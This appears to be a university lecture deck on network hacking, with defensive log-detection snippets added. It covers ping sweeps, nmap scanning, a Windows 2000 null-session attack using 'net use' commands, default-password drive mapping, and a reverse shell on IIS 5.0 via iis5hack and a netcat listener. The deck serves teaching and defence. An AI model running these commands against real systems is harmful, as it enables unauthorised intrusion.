ITP 457 Network Security Network Hacking 101


Hacking Methodology (review)
1. Gather target information
2. Identify services and ports open on the target
3. Research the discovered services for known vulnerabilities
4. Attempt to exploit the services
5. Utilize exploited services to gain additional privileges from the target
6. Reiterate steps 1-5 until goals are achieved

Network Hacking
Methodology changes slightly because we are focused at this point on security from the inside
1. Gather information & map the network
2. Scan systems to see what's alive
3. Determine services running
4. Attempt to penetrate the systems (if you want)

Gathering Information
- Upon connection to the network, check your IP (normally automatically assigned)
- Windows: ipconfig
- Linux: ifconfig

Useful information from ipconfig
- Physical Address: your computer's MAC address
- IP Address: the IP address assigned to your computer
- Subnet Mask: the mask used to limit the number of computers on the network
- Default gateway: the computer that is used to connect to IP addresses outside of the network
- DHCP server: the computer that distributes IP addresses
- DNS servers: the computers that translate domain names to IP addresses
- ipconfig will identify between 1 and 3 computers without any scanning! (DHCP, DNS, Gateway)

"Knock-knock" Ping sweep
- Ping: ICMP "echo request" packets
- Will return if host is reachable (alive)
- Single command: ping host
- Host can be an IP or a domain name (e.g.
- We want to see all the hosts on our particular network
- Nmap (or Umit): nmap -sP

Ping sweep vs. port scanning
- Why not start with port scanning?
- Normally, ping scanning is benign and will not get you in trouble or caught
- Port scanning is almost always seen as malicious
- Limit the amount of time that you are port scanning by just looking at systems that are alive
- Also, there may be multiple subnets (multiple parts of the network), with some not being occupied. A ping sweep will quickly determine if a particular IP range is up or not.
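Seen from the monitoring side, a ping sweep and a port scan each leave a distinct pattern in flow records: one source touching many hosts, or many ports on one host, in a short time. The detector below is an added example, not part of the original slides; the record format, addresses and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def sample_log():
    """Constructed flow records: 'time src dst kind dport' (not from the slides)."""
    t0, rows = datetime(2024, 1, 10, 9, 0, 0), []
    def add(sec, src, dst, kind, port="-"):
        rows.append(f"{(t0 + timedelta(seconds=sec)).isoformat()} {src} {dst} {kind} {port}")
    for i in range(8):                        # one host pings 8 neighbours in 8 s
        add(i, "192.168.1.50", f"192.168.1.{i + 1}", "icmp-echo")
    for i, port in enumerate(range(20, 32)):  # then SYNs 12 ports on one live host
        add(20 + i, "192.168.1.50", "192.168.1.3", "tcp-syn", port)
    for i in range(6):                        # monitoring box pings the gateway every 30 s
        add(30 * i, "192.168.1.77", "192.168.1.1", "icmp-echo")
    add(5, "192.168.1.77", "192.168.1.3", "tcp-syn", 80)  # ordinary web request
    return "\n".join(rows)

def burst(events, window, threshold):
    """True if >= threshold distinct values occur within any span of length window."""
    events = sorted(events)
    for i, (start, _) in enumerate(events):
        if len({v for t, v in events[i:] if t - start <= window}) >= threshold:
            return True
    return False

def detect(log, window=timedelta(seconds=60), sweep_hosts=5, scan_ports=10):
    """Flag sources that ping many hosts, or SYN many ports on one host, in a window."""
    pings, syns = defaultdict(list), defaultdict(list)
    for line in log.splitlines():
        ts, src, dst, kind, port = line.split()
        when = datetime.fromisoformat(ts)
        if kind == "icmp-echo":
            pings[src].append((when, dst))
        elif kind == "tcp-syn":
            syns[(src, dst)].append((when, int(port)))
    alerts = [("ping-sweep", src, "*") for src, ev in pings.items()
              if burst(ev, window, sweep_hosts)]
    alerts += [("port-scan", src, dst) for (src, dst), ev in syns.items()
               if burst(ev, window, scan_ports)]
    return sorted(alerts)

if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

With a 3-second window neither burst reaches its threshold, which shows how the window and threshold choice decides what the detector misses.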

Determine Running Systems
- Portscan the system that you want to break into
- Nmap will give a great report, including port service numbers, which is very useful for determining what is vulnerable
- Nmap will also try to tell you what operating system they are running
- Is it always reliable?

Breaking in
- Once you've discovered what services are running, you have to see which are vulnerable
- Determine which service you want to break, and find a vulnerability
- Places to look:

Null Session Hack
- One of the oldest tricks for Windows 2000
- Will allow any hard disk mounted in the Win2k machine to be mapped as a network drive on the hacker's machine
- Utilizes a vulnerability in the SMB shares
- First, determine the IP address of the Windows 2000 machine
- Example:

Null Session Hack Cont'd
- Establish the null session: net use \\ipaddress\ipc$ "" /u:""
- This command establishes the null session connection

Get the list of the usernames
- The program Dumpsec will give you the usernames and a whole lot more
- bin/download.pl?DumpAcl
- Go to select computer, and enter the computer address
- Go to "Dump Users as Column", and it will give you options to add more information to the report

DumpSec

Map the network drive
- The command "net use" can also be used to map the victim's machine as a network drive on your computer
- Caveat: you must know an administrator's username and password
- In our case, the user "Bob" does not have a password, which is typical for insecure computers
- Another common one: username "Administrator", password "Password"
- The command: net use Z: \\ \c$ "password" /u:"username"
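The sequence on the last few slides (a session to IPC$ with no credentials, then a drive share mapped with a real account) is something a defender can correlate per source address. The sketch below is an added example, not part of the original slides; the pipe-separated record format and the addresses are hypothetical and constructed, and a real deployment would fill these fields from the server's logon and share-access auditing.

```python
import re
from datetime import datetime, timedelta

# Constructed SMB session records (hypothetical export format):
# time | source | user ("" = no credentials supplied) | share
SAMPLE = """\
2024-01-10T10:00:00|192.168.1.50||IPC$
2024-01-10T10:01:30|192.168.1.50||IPC$
2024-01-10T10:09:00|192.168.1.50|Bob|C$
2024-01-10T10:15:00|192.168.1.20|alice|Reports
2024-01-10T11:00:00|192.168.1.60||IPC$
2024-01-10T13:30:00|192.168.1.60|Administrator|C$
"""

def parse(log):
    """Yield (time, source, user, share) tuples from the constructed format."""
    for line in log.strip().splitlines():
        ts, src, user, share = line.split("|")
        yield datetime.fromisoformat(ts), src, user, share.upper()

def correlate(log, window=timedelta(minutes=30)):
    """Return {source: finding} for every source that opened a null session.

    A null session alone is reported; it is escalated when the same source
    maps a drive share (C$, D$, ...) within `window` of its last null session.
    """
    last_null, findings = {}, {}
    for when, src, user, share in sorted(parse(log)):
        if share == "IPC$" and user == "":
            last_null[src] = when
            findings.setdefault(src, "null-session")
        elif re.fullmatch(r"[A-Z]\$", share) and src in last_null:
            if when - last_null[src] <= window:
                findings[src] = f"null-session then {share} as {user}"
    return findings

if __name__ == "__main__":
    for src, finding in correlate(SAMPLE).items():
        print(src, "->", finding)
```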

Golly!

We want more!
- We've established a remote drive connection, but we cannot run any commands
- We need either a remote shell (Windows command prompt) or a remote window (VNC or terminal services)
- Shell is easier, and does not require a lot of bandwidth

Remember the portscanning
- IIS was installed
- Version 5.0
- So let's take a look and see what's available
- Download IIS5hack from the exploit section
- You will also need netcat
- Use the command: nc -l -p 1111
- Tells netcat to listen on port 1111

The hack!
- With netcat running, open another command prompt, and enter the command: iis5hack.exe victim-ip your-ip port-number
- example: iis5hack.exe
- This will open up a remote shell in the netcat window
- MAKE SURE THE WINDOWS FIREWALL IS TURNED OFF!!!

What have you learned?
- Methodology of a hack
- How to remotely map a drive from a Windows 2000 machine
- How to hack IIS 5.0

Your lab
- Find another way to hack into a Windows 2000 machine
- Find a way to hack into the Windows XP SP0 machine
- Give me step-by-step instructions on how you did it. What sites did you go to? What tools did you use?